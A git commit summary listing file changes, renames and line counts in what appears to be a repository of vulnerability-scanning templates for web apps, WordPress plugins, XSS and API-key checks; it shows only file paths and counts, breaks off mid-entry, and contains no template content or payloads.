poc/web/cobbler-webgui-1123.yaml | 31 + poc/web/cobbler-webgui-1124.yaml | 31 - poc/web/codemeter-webadmin-panel-1135.yaml | 21 + poc/web/codemeter-webadmin-panel-1138.yaml | 31 - poc/web/codemeter-webadmin-panel.yaml | 20 +- poc/web/dixell-xweb500-filewrite-7018.yaml | 14 +- poc/web/dixell-xweb500-filewrite-7020.yaml | 11 +- poc/web/epson-web-control-detect-7239.yaml | 13 +- poc/web/epson-web-control-detect-7242.yaml | 10 +- poc/web/exposed-webalizer-7358.yaml | 18 + poc/web/exposed-webalizer-7360.yaml | 18 - .../fingerprinthub-web-fingerprints-7481.yaml | 3068 +- poc/web/fingerprinthub-web-fingerprints.yaml | 2992 +- poc/web/geovision-geowebserver-lfi-7595.yaml | 20 +- 
poc/web/geovision-geowebserver-lfi-7596.yaml | 17 +- poc/web/git-web-interface.yaml | 11 +- poc/web/hashicorp-consul-webgui-7896.yaml | 32 + poc/web/hashicorp-consul-webgui-7898.yaml | 2 +- poc/web/honeywell-web-controller-7996.yaml | 23 - poc/web/honeywell-web-controller.yaml | 18 +- poc/web/icewarp-webclient-rce-8133.yaml | 25 - poc/web/icinga-web-login-8134.yaml | 22 + poc/web/icinga-web-login-8137.yaml | 23 - poc/web/icinga-web-login.yaml | 13 +- poc/web/iplanet-web-server-8190.yaml | 21 - poc/web/iplanet-web-server-8191.yaml | 21 + poc/web/iplanet-web-server.yaml | 4 +- poc/web/keenetic-web-login-8442.yaml | 19 + poc/web/keenetic-web-login-8443.yaml | 22 - poc/web/microweber-detect-8863.yaml | 5 +- poc/web/microweber-detect.yaml | 14 +- poc/web/microweber-xss.yaml | 7 +- poc/web/oracle-iplanet-web-server-9392.yaml | 28 + poc/web/oracle-iplanet-web-server.yaml | 21 - poc/web/r-webserver-login.yaml | 22 +- poc/web/saia-web-server-info-9979.yaml | 3 +- poc/web/saia-web-server-info.yaml | 20 + poc/web/sap-netweaver-webgui.yaml | 20 - poc/web/sap-web-dispatcher-10078.yaml | 9 +- ...sap-web-dispatcher-admin-portal-10071.yaml | 32 + poc/web/slack-webhook(1).yaml | 16 + poc/web/slack-webhook-11865.yaml | 13 - poc/web/slack-webhook.yaml | 4 - poc/web/spark-webui-unauth-10401.yaml | 26 + poc/web/spark-webui-unauth.yaml | 15 +- poc/web/synology-web-station-10631.yaml | 19 +- poc/web/synology-web-station-10632.yaml | 18 +- poc/web/web-config-11125.yaml | 24 - poc/web/web-ftp-detect-11136.yaml | 28 - poc/web/web-ftp-detect-11137.yaml | 43 +- poc/web/web-local-craft-11139.yaml | 19 + poc/web/web-local-craft-11141.yaml | 20 - poc/web/web-service-panel.yaml | 22 +- poc/web/web-suite-detect-11168.yaml | 36 + poc/web/web-suite-detect.yaml | 31 - poc/web/webcamxp-5-11122.yaml | 34 - poc/web/webcamxp-5.yaml | 21 + poc/web/webeditors-11129.yaml | 28 - poc/web/webflow-takeover-11131.yaml | 15 - poc/web/webflow-takeover-11133.yaml | 15 + poc/web/webflow-takeover.yaml | 2 +- 
poc/web/weblogic-iiop-detect-11148.yaml | 4 - poc/web/weblogic-t3-detect-11151.yaml | 23 +- ...152.yaml => weblogic-t3-detect-11153.yaml} | 0 poc/web/weblogic-weak-login-11154.yaml | 68 - poc/web/weblogic-weak-login-11155.yaml | 14 +- poc/web/webmodule-ee-11162.yaml | 19 + poc/web/webmodule-ee-11164.yaml | 22 - ...160.yaml => webmodule-ee-panel-11161.yaml} | 0 poc/web/webmodule-ee.yaml | 2 + poc/web/webtools-home.yaml | 13 +- poc/web/webui-rce-11170.yaml | 21 - poc/web/webui-rce-11174.yaml | 20 + poc/web/webui-rce.yaml | 1 + ...webview-addjavascript-interface-11175.yaml | 5 +- ...ebview-addjavascript-interface-11176.yaml} | 0 poc/web/webview-javascript.yaml | 11 +- poc/web/webview-load-url-11180.yaml | 13 + poc/web/webview-load-url-11182.yaml | 12 - poc/web/webview-universal-access-11183.yaml | 5 +- poc/web/webview-universal-access.yaml | 14 +- poc/web/xp-webcam.yaml | 22 - poc/web/zoho-webhook-token-11835.yaml | 2 +- poc/wordpress/alfacgiapi-wordpress-256.yaml | 62 +- poc/wordpress/alfacgiapi-wordpress.yaml | 33 - .../dahua-wpms-addimgico-fileupload.yaml | 78 +- poc/wordpress/easy-wp-smtp-listing-7156.yaml | 19 + poc/wordpress/easy-wp-smtp-listing-7157.yaml | 21 - poc/wordpress/easy-wp-smtp-listing.yaml | 5 +- poc/wordpress/feedwordpress-xss-7459.yaml | 35 + .../nativechurch-wp-theme-lfd-9001.yaml | 26 - .../nativechurch-wp-theme-lfd-9002.yaml | 14 +- .../trilithic-viewpoint-default-10835.yaml | 39 - .../viewpoint-system-status-11018.yaml | 8 +- .../viewpoint-system-status-11019.yaml | 20 - poc/wordpress/wordpress-LFI.yaml | 6 +- .../wordpress-accessible-wpconfig-11235.yaml | 38 - .../wordpress-accessible-wpconfig-11238.yaml | 12 +- .../wordpress-affiliatewp-log-11240.yaml | 23 - .../wordpress-affiliatewp-log-11242.yaml | 23 + poc/wordpress/wordpress-affiliatewp-log.yaml | 11 +- ...ordpress-bbpress-plugin-listing-11245.yaml | 3 +- .../wordpress-bbpress-plugin-listing.yaml | 23 + poc/wordpress/wordpress-db-repair-11252.yaml | 35 + ...58.yaml => 
wordpress-debug-log-11259.yaml} | 0 ...11261.yaml => wordpress-detect-11260.yaml} | 0 poc/wordpress/wordpress-detect.yaml | 57 +- .../wordpress-directory-listing-11266.yaml | 10 +- ...ls-verification-for-woocommerce-11271.yaml | 25 +- .../wordpress-emergency-script-11272.yaml | 24 - .../wordpress-emergency-script-11275.yaml | 24 + .../wordpress-emergency-script-11277.yaml | 6 +- poc/wordpress/wordpress-emergency-script.yaml | 14 +- poc/wordpress/wordpress-git-config-11278.yaml | 26 - poc/wordpress/wordpress-git-config-11279.yaml | 16 +- .../wordpress-gotmls-detect-11280.yaml | 30 - poc/wordpress/wordpress-gotmls-detect.yaml | 20 +- ...ress-gtranslate-plugin-listing-11282.yaml} | 0 .../wordpress-gtranslate-plugin-listing.yaml | 22 - ...ordpress-infinitewp-auth-bypass-11287.yaml | 21 +- ...ordpress-infinitewp-auth-bypass-11288.yaml | 60 - ...aml => wordpress-installer-log-11292.yaml} | 0 poc/wordpress/wordpress-installer-log.yaml | 12 +- poc/wordpress/wordpress-lfi.yaml | 21 - poc/wordpress/wordpress-login.yaml | 16 +- .../wordpress-plugins-detect-11298.yaml | 8 +- poc/wordpress/wordpress-plugins-detect.yaml | 30 +- .../wordpress-rce-simplefilelist-11299.yaml | 35 +- .../wordpress-rce-simplefilelist-11304.yaml | 18 +- ...ress-redirection-plugin-listing-11306.yaml | 22 - ...ess-redirection-plugin-listing-11308.yaml} | 0 poc/wordpress/wordpress-takeover-11311.yaml | 6 +- poc/wordpress/wordpress-takeover-11312.yaml | 23 + poc/wordpress/wordpress-takeover-11313.yaml | 22 - .../wordpress-themes-detect-11316.yaml | 22 + poc/wordpress/wordpress-themes-detect.yaml | 22 +- poc/wordpress/wordpress-themes2.yaml | 11 +- ...s-total-upkeep-backup-download-11324.yaml} | 0 ...ordpress-total-upkeep-backup-download.yaml | 13 +- .../wordpress-updraftplus-pem-key.yaml | 12 +- poc/wordpress/wordpress-user-enum-11330.yaml | 11 +- .../wordpress-weak-credentials-11336.yaml | 43 + .../wordpress-weak-credentials-11337.yaml | 37 - poc/wordpress/wordpress-weak-credentials.yaml | 17 +- 
.../wordpress-woocommerce-listing-11338.yaml | 7 +- .../wordpress-woocommerce-listing-11339.yaml | 22 - .../wordpress-woocommerce-listing-11341.yaml | 23 + .../wordpress-woocommerce-sqli-11342.yaml | 6 +- .../wordpress-woocommerce-sqli-11345.yaml | 44 - poc/wordpress/wordpress-woosidebars.yaml | 49 - .../wordpress-wordfence-lfi-11346.yaml | 21 + .../wordpress-wordfence-lfi-11348.yaml | 4 +- .../wordpress-wordfence-lfi-11350.yaml | 21 - ...dpress-wordfence-waf-bypass-xss-11353.yaml | 23 +- ...dpress-wordfence-waf-bypass-xss-11354.yaml | 5 +- ...dpress-wordfence-waf-bypass-xss-11356.yaml | 25 - .../wordpress-wordfence-xss-11359.yaml | 8 +- poc/wordpress/wordpress-workflow-11363.yaml | 14 - poc/wordpress/wordpress-workflow-11365.yaml | 29 + poc/wordpress/wordpress-workflow.yaml | 23 +- ...press-wpcourses-info-disclosure-11369.yaml | 34 + ...press-wpcourses-info-disclosure-11371.yaml | 36 - .../wordpress-wpcourses-info-disclosure.yaml | 13 +- .../wordpress-xmlrpc-listmethods-11372.yaml | 23 - ...> wordpress-xmlrpc-listmethods-11374.yaml} | 0 .../wordpress-zebra-form-xss-11378.yaml | 40 - .../wordpress-zebra-form-xss-11379.yaml | 38 + poc/wordpress/wordpress-zebra-form-xss.yaml | 35 +- poc/wordpress/wordpress.yaml | 52062 +++++++++++ poc/wordpress/wp-ambience-xss-11407.yaml | 24 + poc/wordpress/wp-arforms-listing-11415.yaml | 31 + poc/wordpress/wp-code-snippets-xss-11426.yaml | 19 +- ...s-11425.yaml => wp-code-snippets-xss.yaml} | 0 poc/wordpress/wp-config-setup.yaml | 15 +- poc/wordpress/wp-custom-tables-xss-11433.yaml | 26 + poc/wordpress/wp-custom-tables-xss-11434.yaml | 25 - poc/wordpress/wp-custom-tables-xss-11435.yaml | 8 +- poc/wordpress/wp-debug-log.yaml | 58 +- .../wp-email-subscribers-listing-11443.yaml | 3 +- .../wp-email-subscribers-listing.yaml | 23 - poc/wordpress/wp-finder-xss-11445.yaml | 24 - poc/wordpress/wp-finder-xss-11448.yaml | 7 +- poc/wordpress/wp-flagem-xss-11454.yaml | 5 + poc/wordpress/wp-force-ssl.yaml | 59 + 
.../wp-full-path-disclosure-11455.yaml | 16 + .../wp-full-path-disclosure-11457.yaml | 18 - poc/wordpress/wp-full-path-disclosure.yaml | 9 +- .../wp-grimag-open-redirect-11458.yaml | 17 + .../wp-grimag-open-redirect-11461.yaml | 9 +- .../wp-grimag-open-redirect-11462.yaml | 26 +- ...=> wp-gtranslate-open-redirect-11463.yaml} | 0 .../wp-gtranslate-open-redirect-11465.yaml | 22 - poc/wordpress/wp-haberadam-idor.yaml | 18 +- ...stall-11475.yaml => wp-install-11473.yaml} | 0 poc/wordpress/wp-install.yaml | 22 + .../wp-iwp-client-listing-11478.yaml | 14 +- .../wp-iwp-client-listing-11479.yaml | 17 +- poc/wordpress/wp-javospot-lfi-11482.yaml | 38 + poc/wordpress/wp-javospot-lfi.yaml | 26 - poc/wordpress/wp-knews-xss-11487.yaml | 25 - poc/wordpress/wp-knews-xss-11488.yaml | 29 + .../wp-mailchimp-log-exposure-11494.yaml | 2 +- ...p-memphis-documents-library-lfi-11495.yaml | 38 + ...p-memphis-documents-library-lfi-11496.yaml | 4 +- .../wp-mstore-plugin-listing-11500.yaml | 30 + .../wp-multiple-theme-ssrf-11512.yaml | 4 - .../wp-multiple-theme-ssrf-11513.yaml | 27 + poc/wordpress/wp-nextgen-xss-11516.yaml | 2 +- poc/wordpress/wp-phpfreechat-xss-11524.yaml | 24 - poc/wordpress/wp-phpfreechat-xss-11527.yaml | 8 +- poc/wordpress/wp-phpfreechat-xss-11528.yaml | 2 +- ...p-plugin-1-flashgallery-listing-11530.yaml | 27 + ... 
=> wp-plugin-1-flashgallery-listing.yaml} | 0 .../wp-plugin-utlimate-member-11541.yaml | 7 +- ...l => wp-plugin-utlimate-member-11542.yaml} | 0 ...sting.yaml => wp-popup-listing-11543.yaml} | 0 poc/wordpress/wp-popup-listing-11545.yaml | 10 +- .../wp-prostore-open-redirect-11546.yaml | 17 - .../wp-prostore-open-redirect-11549.yaml | 14 +- .../wp-prostore-open-redirect-11550.yaml | 20 + poc/wordpress/wp-qards-listing-11552.yaml | 21 - poc/wordpress/wp-qards-listing.yaml | 25 + .../wp-revslider-file-download-11554.yaml | 29 + poc/wordpress/wp-revslider-file-download.yaml | 14 +- poc/wordpress/wp-securimage-xss-11556.yaml | 24 + poc/wordpress/wp-securimage-xss-11559.yaml | 2 +- poc/wordpress/wp-securimage-xss-11560.yaml | 25 - ...62.yaml => wp-sfwd-lms-listing-11564.yaml} | 0 poc/wordpress/wp-sfwd-lms-listing-11565.yaml | 3 +- poc/wordpress/wp-simple-fields-lfi-11566.yaml | 19 +- poc/wordpress/wp-simple-fields-lfi-11569.yaml | 20 - poc/wordpress/wp-slideshow-xss-11572.yaml | 28 - poc/wordpress/wp-slideshow-xss-11574.yaml | 29 + poc/wordpress/wp-socialfit-xss-11577.yaml | 4 +- poc/wordpress/wp-super-forms-11585.yaml | 19 +- poc/wordpress/wp-super-forms-11588.yaml | 17 +- poc/wordpress/wp-tinymce-lfi.yaml | 10 +- poc/wordpress/wp-tutor-lfi-11596.yaml | 17 +- ...tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} | 0 poc/wordpress/wp-upload-data-11605.yaml | 5 - poc/wordpress/wp-vault-lfi-11610.yaml | 4 +- .../wp-vault-local-file-inclusion.yaml | 33 + poc/wordpress/wp-whmcs-xss-11614.yaml | 37 + poc/wordpress/wp-whmcs-xss.yaml | 8 +- ...-woocommerce-email-verification-11619.yaml | 47 +- .../wp-woocommerce-file-download-11620.yaml | 38 + .../wp-woocommerce-file-download.yaml | 25 - .../wp-xmlrpc-brute-force-11623.yaml | 2 +- .../wp-xmlrpc-pingback-detection.yaml | 11 +- poc/wordpress/wpdm-cache-session-11436.yaml | 23 + poc/wordpress/wpdm-cache-session-11438.yaml | 24 - poc/wordpress/wpengine-config-check.yaml | 22 - .../wptouch-open-redirect-11592.yaml | 24 + 
.../wptouch-open-redirect-11595.yaml | 23 +- .../wptouch-plugin-open-redirect.yaml | 13 +- ...pringboot-actuators-jolokia-xxe-10430.yaml | 28 + ...pringboot-actuators-jolokia-xxe-10431.yaml | 31 - poc/xss/aem-setpreferences-xss.yaml | 30 - ...ml => aem-xss-childlist-selector-198.yaml} | 0 poc/xss/aem-xss-childlist-selector.yaml | 37 - poc/xss/basic-xss-prober-698.yaml | 35 - poc/xss/blind-xss-user-agent.yaml | 79 +- poc/xss/blind-xss.yaml | 16 +- poc/xss/ckan-dom-based-xss-992.yaml | 39 +- poc/xss/ckan-dom-based-xss-993.yaml | 42 +- poc/xss/coldfusion-debug-xss-1153.yaml | 31 + poc/xss/coldfusion-debug-xss.yaml | 34 - poc/xss/concrete-xss-1178.yaml | 35 + ...ncrete-xss-1177.yaml => concrete-xss.yaml} | 0 poc/xss/discourse-xss-7014.yaml | 4 +- poc/xss/elex-woocommerce-xss-7199.yaml | 47 - poc/xss/elex-woocommerce-xss.yaml | 35 + ...recms-xss.yaml => empirecms-xss-7218.yaml} | 0 poc/xss/empirecms-xss-7220.yaml | 25 - poc/xss/feedwordpress-xss-7459.yaml | 35 + poc/xss/flow-flow-social-stream-xss-7524.yaml | 41 + poc/xss/flow-flow-social-stream-xss.yaml | 27 - ...fuzzing-xss-get-params-html-injection.yaml | 8 +- poc/xss/global-domains-xss.yaml | 3 +- poc/xss/header_blind_xss-7914.yaml | 14 +- poc/xss/httpbin-xss-8052.yaml | 22 +- poc/xss/id-q-xss.yaml | 4 + poc/xss/kafdrop-xss-8411.yaml | 23 - poc/xss/kafdrop-xss-8414.yaml | 24 +- poc/xss/keycloak-xss-8481.yaml | 5 +- poc/xss/keycloak-xss-8482.yaml | 9 +- poc/xss/laravel-ignition-xss-8593.yaml | 18 +- poc/xss/laravel-ignition-xss.yaml | 30 + poc/xss/microweber-xss.yaml | 7 +- poc/xss/mida-eframework-xss-8868.yaml | 7 +- poc/xss/mida-eframework-xss.yaml | 24 + poc/xss/moodle-filter-jmol-xss-8942.yaml | 13 +- poc/xss/moodle-filter-jmol-xss-8946.yaml | 18 - poc/xss/moodle-xss-8950.yaml | 33 - poc/xss/moodle-xss-8952.yaml | 12 +- poc/xss/my-chatbot-xss.yaml | 13 +- poc/xss/oracle-ebs-xss-9373.yaml | 29 + poc/xss/oracle-ebs-xss-9376.yaml | 33 - poc/xss/oracle-ebs-xss-9377.yaml | 6 +- poc/xss/oracle-siebel-xss-9400.yaml | 25 
+- poc/xss/oracle-siebel-xss-9402.yaml | 10 +- poc/xss/parentlink-xss-9467.yaml | 32 + poc/xss/parentlink-xss.yaml | 26 + poc/xss/php-timeclock-xss-9552.yaml | 19 +- poc/xss/php-timeclock-xss-9553.yaml | 45 +- poc/xss/qcubed-xss-9749.yaml | 42 - poc/xss/qcubed-xss.yaml | 27 + poc/xss/rails6-xss-9797.yaml | 17 +- poc/xss/rails6-xss-9798.yaml | 29 +- poc/xss/rockmongo-xss-9902.yaml | 28 - poc/xss/rockmongo-xss-9904.yaml | 23 +- .../nuclei_template.yaml => xss/rxss.yaml} | 0 poc/xss/samsung-wlan-ap-xss-10012.yaml | 25 + poc/xss/samsung-wlan-ap-xss.yaml | 24 - poc/xss/sniplets-xss.yaml | 10 +- poc/xss/squirrelmail-add-xss-10515.yaml | 39 + poc/xss/squirrelmail-add-xss.yaml | 25 - poc/xss/thruk-xss-10758.yaml | 8 +- poc/xss/thruk-xss-10759.yaml | 29 + poc/xss/top-xss-params-10807.yaml | 75 + poc/xss/top-xss-params-10809.yaml | 81 - poc/xss/turbocrm-xss-10848.yaml | 24 +- poc/xss/turbocrm-xss-10851.yaml | 23 +- poc/xss/vanguard-post-xss-10992.yaml | 21 +- poc/xss/vanguard-post-xss-10994.yaml | 23 +- ...r-xss.yaml => wems-manager-xss-11192.yaml} | 0 poc/xss/wems-manager-xss-11194.yaml | 21 +- poc/xss/window-name-domxss-11213.yaml | 81 + poc/xss/window-name-domxss.yaml | 80 - ...dpress-wordfence-waf-bypass-xss-11353.yaml | 23 +- ...dpress-wordfence-waf-bypass-xss-11354.yaml | 5 +- ...dpress-wordfence-waf-bypass-xss-11356.yaml | 25 - poc/xss/wordpress-wordfence-xss-11359.yaml | 8 +- poc/xss/wordpress-zebra-form-xss-11378.yaml | 40 - poc/xss/wordpress-zebra-form-xss-11379.yaml | 38 + poc/xss/wordpress-zebra-form-xss.yaml | 35 +- poc/xss/wp-ambience-xss-11407.yaml | 24 + poc/xss/wp-code-snippets-xss-11426.yaml | 19 +- ...s-11425.yaml => wp-code-snippets-xss.yaml} | 0 poc/xss/wp-custom-tables-xss-11433.yaml | 26 + poc/xss/wp-custom-tables-xss-11434.yaml | 25 - poc/xss/wp-custom-tables-xss-11435.yaml | 8 +- poc/xss/wp-finder-xss-11445.yaml | 24 - poc/xss/wp-finder-xss-11448.yaml | 7 +- poc/xss/wp-flagem-xss-11454.yaml | 5 + poc/xss/wp-knews-xss-11487.yaml | 25 - 
poc/xss/wp-knews-xss-11488.yaml | 29 + poc/xss/wp-nextgen-xss-11516.yaml | 2 +- poc/xss/wp-phpfreechat-xss-11524.yaml | 24 - poc/xss/wp-phpfreechat-xss-11527.yaml | 8 +- poc/xss/wp-phpfreechat-xss-11528.yaml | 2 +- poc/xss/wp-securimage-xss-11556.yaml | 24 + poc/xss/wp-securimage-xss-11559.yaml | 2 +- poc/xss/wp-securimage-xss-11560.yaml | 25 - poc/xss/wp-slideshow-xss-11572.yaml | 28 - poc/xss/wp-slideshow-xss-11574.yaml | 29 + poc/xss/wp-socialfit-xss-11577.yaml | 4 +- poc/xss/wp-whmcs-xss-11614.yaml | 37 + poc/xss/wp-whmcs-xss.yaml | 8 +- 5021 files changed, 255291 insertions(+), 71831 deletions(-) delete mode 100644 poc/adobe/adobe-coldfusion-detect-82.yaml create mode 100644 poc/adobe/adobe-coldfusion-error-detect-86.yaml rename poc/adobe/{adobe-coldfusion-error-detect-88.yaml => adobe-coldfusion-error-detect.yaml} (100%) create mode 100644 poc/adobe/adobe-component-login-89.yaml delete mode 100644 poc/adobe/adobe-component-login-90.yaml create mode 100644 poc/adobe/adobe-component-login-91.yaml rename poc/adobe/{adobe-connect-central-login-93.yaml => adobe-connect-central-login-96.yaml} (100%) delete mode 100644 poc/adobe/adobe-connect-username-exposure-100.yaml delete mode 100644 poc/adobe/adobe-connect-version-104.yaml rename poc/adobe/{adobe-connect-version-102.yaml => adobe-connect-version.yaml} (100%) delete mode 100644 poc/adobe/adobe-experience-manager-login-105.yaml create mode 100644 poc/adobe/adobe-experience-manager-login-106.yaml create mode 100644 poc/adobe/adobe-media-server-114.yaml delete mode 100644 poc/adobe/adobe-media-server.yaml delete mode 100644 poc/adobe/aem-bg-servlet-129.yaml create mode 100644 poc/adobe/aem-bg-servlet.yaml rename poc/adobe/{aem-default-get-servlet-137.yaml => aem-default-get-servlet-135.yaml} (100%) delete mode 100644 poc/adobe/aem-default-login-140.yaml delete mode 100644 poc/adobe/aem-gql-servlet-149.yaml create mode 100644 poc/adobe/aem-gql-servlet-150.yaml delete mode 100644 poc/adobe/aem-groovyconsole-154.yaml 
delete mode 100644 poc/adobe/aem-jcr-querybuilder-162.yaml create mode 100644 poc/adobe/aem-jcr-querybuilder-165.yaml rename poc/adobe/{aem-login-status-169.yaml => aem-login-status-167.yaml} (100%) delete mode 100644 poc/adobe/aem-merge-metadata-servlet-174.yaml create mode 100644 poc/adobe/aem-querybuilder-internal-path-read-179.yaml delete mode 100644 poc/adobe/aem-querybuilder-internal-path-read-180.yaml create mode 100644 poc/adobe/aem-secrets.yaml delete mode 100644 poc/adobe/aem-setpreferences-xss.yaml delete mode 100644 poc/adobe/aem-userinfo-servlet-192.yaml create mode 100644 poc/adobe/aem-userinfo-servlet-193.yaml rename poc/adobe/{aem-xss-childlist-selector-197.yaml => aem-xss-childlist-selector-198.yaml} (100%) delete mode 100644 poc/adobe/aem-xss-childlist-selector.yaml delete mode 100644 poc/adobe/possible-AEM-secrets.yaml create mode 100644 poc/airflow/airflow-configuration-exposure-230.yaml delete mode 100644 poc/airflow/airflow-configuration-exposure.yaml create mode 100644 poc/airflow/airflow-debug-231.yaml delete mode 100644 poc/airflow/airflow-debug-233.yaml delete mode 100644 poc/airflow/airflow-detect-239.yaml create mode 100644 poc/airflow/airflow-detect-240.yaml create mode 100644 poc/airflow/airflow-panel-242.yaml rename poc/airflow/{airflow-panel-241.yaml => airflow-panel-244.yaml} (100%) create mode 100644 poc/airflow/unauthenticated-airflow-10884.yaml delete mode 100644 poc/airflow/unauthenticated-airflow-10886.yaml create mode 100644 poc/apache/apache-answer-detect.yaml delete mode 100644 poc/apache/apache-apisix-panel-337.yaml create mode 100644 poc/apache/apache-apisix-panel-338.yaml create mode 100644 poc/apache/apache-axis-detect-339.yaml rename poc/apache/{apache-axis-detect.yaml => apache-axis-detect-341.yaml} (100%) delete mode 100644 poc/apache/apache-cocoon-detect-342.yaml create mode 100644 poc/apache/apache-cocoon-detect.yaml rename poc/apache/{apache-detect.yaml => apache-detect-346.yaml} (100%) delete mode 100644 
poc/apache/apache-flink-unauth-rce-355.yaml delete mode 100644 poc/apache/apache-httpd-rce-362.yaml create mode 100644 poc/apache/apache-solr-file-read-368.yaml delete mode 100644 poc/apache/apache-solr-file-read-369.yaml create mode 100644 poc/apache/apache-solr-log4j-rce-372.yaml delete mode 100644 poc/apache/default-apache-test-all.yaml delete mode 100644 poc/apache/default-apache2-ubuntu-page.yaml delete mode 100644 poc/api/alfacgiapi-wordpress.yaml delete mode 100644 poc/api/apache-apisix-panel-337.yaml create mode 100644 poc/api/apache-apisix-panel-338.yaml create mode 100644 poc/api/api-abstractapi-383.yaml rename poc/api/{api-abuseipdb-384.yaml => api-abuseipdb-385.yaml} (100%) create mode 100644 poc/api/api-abuseipdb.yaml delete mode 100644 poc/api/api-accuweather-386.yaml create mode 100644 poc/api/api-accuweather.yaml delete mode 100644 poc/api/api-adafruit-io-387.yaml create mode 100644 poc/api/api-adafruit-io.yaml delete mode 100644 poc/api/api-alienvault-388.yaml delete mode 100644 poc/api/api-apigee-edge-391.yaml create mode 100644 poc/api/api-apigee-edge.yaml delete mode 100644 poc/api/api-appveyor-392.yaml create mode 100644 poc/api/api-appveyor.yaml create mode 100644 poc/api/api-bible-394.yaml delete mode 100644 poc/api/api-bible.yaml delete mode 100644 poc/api/api-bingmaps.yaml create mode 100644 poc/api/api-bitrise-397.yaml delete mode 100644 poc/api/api-bitrise.yaml delete mode 100644 poc/api/api-block-400.yaml create mode 100644 poc/api/api-block.yaml delete mode 100644 poc/api/api-blockchain.yaml delete mode 100644 poc/api/api-buildkite.yaml delete mode 100644 poc/api/api-circleci.yaml delete mode 100644 poc/api/api-coinapi-408.yaml create mode 100644 poc/api/api-coinapi.yaml delete mode 100644 poc/api/api-debounce-414.yaml create mode 100644 poc/api/api-debounce.yaml create mode 100644 poc/api/api-deviantart-415.yaml delete mode 100644 poc/api/api-deviantart.yaml rename poc/api/{api-dribbble.yaml => api-dribbble-417.yaml} (100%) create mode 
100644 poc/api/api-europeana-420.yaml create mode 100644 poc/api/api-fastly-424.yaml rename poc/api/{api-fastly.yml => api-fastly.yaml} (100%) create mode 100644 poc/api/api-festivo-425.yaml delete mode 100644 poc/api/api-festivo.yaml delete mode 100644 poc/api/api-fullhunt-428.yaml create mode 100644 poc/api/api-fullhunt.yaml create mode 100644 poc/api/api-google-drive-432.yaml delete mode 100644 poc/api/api-google-drive.yaml delete mode 100644 poc/api/api-hirak-rates-436.yaml create mode 100644 poc/api/api-hirak-rates.yaml delete mode 100644 poc/api/api-hubspot.yaml create mode 100644 poc/api/api-iconfinder-439.yaml delete mode 100644 poc/api/api-improvmx-440.yaml create mode 100644 poc/api/api-improvmx.yaml delete mode 100644 poc/api/api-instatus-442.yaml create mode 100644 poc/api/api-instatus.yaml create mode 100644 poc/api/api-intercom-443.yaml delete mode 100644 poc/api/api-intercom.yaml rename poc/api/{api-ipstack.yaml => api-ipstack-444.yaml} (100%) create mode 100644 poc/api/api-iterable-445.yaml delete mode 100644 poc/api/api-iterable.yaml rename poc/api/{api-jumpcloud.yaml => api-jumpcloud-446.yaml} (100%) rename poc/api/{api-lokalise-452.yaml => api-lokalise.yaml} (100%) delete mode 100644 poc/api/api-mailchimp-454.yaml create mode 100644 poc/api/api-malshare.yaml delete mode 100644 poc/api/api-malwarebazaar-458.yaml delete mode 100644 poc/api/api-mapbox.yaml delete mode 100644 poc/api/api-mojoauth-466.yaml create mode 100644 poc/api/api-mojoauth.yaml delete mode 100644 poc/api/api-mywot-468.yaml delete mode 100644 poc/api/api-netlify-470.yaml create mode 100644 poc/api/api-netlify.yaml delete mode 100644 poc/api/api-openweather.yaml rename poc/api/{api-pagerduty.yaml => api-pagerduty-475.yaml} (100%) create mode 100644 poc/api/api-pendo.yaml create mode 100644 poc/api/api-petfinder-480.yaml delete mode 100644 poc/api/api-petfinder.yaml rename poc/api/{api-pivotaltracker.yaml => api-pivotaltracker-482.yaml} (100%) delete mode 100644 
poc/api/api-postmark-483.yaml delete mode 100644 poc/api/api-rijksmuseum.yaml create mode 100644 poc/api/api-scanii-488.yaml delete mode 100644 poc/api/api-sendgrid-489.yaml rename poc/api/{api-slack-493.yaml => api-slack.yaml} (100%) create mode 100644 poc/api/api-sonarcloud.yaml delete mode 100644 poc/api/api-spotify-495.yaml create mode 100644 poc/api/api-spotify.yaml rename poc/api/{api-square-496.yaml => api-square.yaml} (100%) delete mode 100644 poc/api/api-sslmate-497.yaml create mode 100644 poc/api/api-sslmate.yaml delete mode 100644 poc/api/api-stripe-499.yaml delete mode 100644 poc/api/api-taiga-501.yaml create mode 100644 poc/api/api-taiga.yaml delete mode 100644 poc/api/api-thecatapi-502.yaml delete mode 100644 poc/api/api-tink-504.yaml create mode 100644 poc/api/api-tink.yaml delete mode 100644 poc/api/api-travisci.yaml delete mode 100644 poc/api/api-visualstudio-513.yaml create mode 100644 poc/api/api-visualstudio.yaml create mode 100644 poc/api/api-wakatime.yaml delete mode 100644 poc/api/api-weglot-516.yaml delete mode 100644 poc/api/api-wordcloud-517.yaml delete mode 100644 poc/api/api-youtube-519.yaml create mode 100644 poc/api/api-youtube.yaml delete mode 100644 poc/api/apiman-panel-462.yaml delete mode 100644 poc/api/bems-api-lfi-709.yaml delete mode 100644 poc/api/bems-api-lfi-712.yaml create mode 100644 poc/api/burp-api-detect-810.yaml delete mode 100644 poc/api/burp-api-detect-812.yaml create mode 100644 poc/api/fastapi-docs-7398.yaml delete mode 100644 poc/api/gmail-api-client-secrets-7741.yaml create mode 100644 poc/api/graylog-api-browser-7846.yaml delete mode 100644 poc/api/graylog-api-browser.yaml delete mode 100644 poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml create mode 100644 poc/api/http-etcd-unauthenticated-api-data-leak.yaml create mode 100644 poc/api/kube-api-namespaces-8505.yaml delete mode 100644 poc/api/kube-api-nodes-8508.yaml delete mode 100644 poc/api/kube-api-nodes.yaml create mode 100644 
poc/api/kube-api-pods.yaml create mode 100644 poc/api/magento-2-exposed-api-8688.yaml delete mode 100644 poc/api/mailchimp-api-key-8726.yaml rename poc/api/{mailgun-api-11855.yaml => mailgun-api(1).yaml} (100%) rename poc/api/{strapi-documentation-10543.yaml => strapi-documentation-10542.yaml} (100%) rename poc/api/{strapi-page.yaml => strapi-page-10545.yaml} (100%) create mode 100644 poc/api/stripe-api-key(1).yaml delete mode 100644 poc/api/stripe-api-key-11869.yaml create mode 100644 poc/api/twilio-api-10860.yaml delete mode 100644 poc/api/twilio-api-10861.yaml delete mode 100644 poc/api/unauth-spark-api.yaml delete mode 100644 poc/api/wadl-api-11082.yaml create mode 100644 poc/api/wsdl-api-11634.yaml delete mode 100644 poc/api/wso2-apimanager-detect-11638.yaml create mode 100644 poc/api/yapi-rce-11725.yaml create mode 100644 poc/atlassian/atlassian-bamboo-panel.yaml delete mode 100644 poc/atlassian/atlassian-crowd-panel-583.yaml create mode 100644 poc/atlassian/bitbucket-takeover-738.yaml delete mode 100644 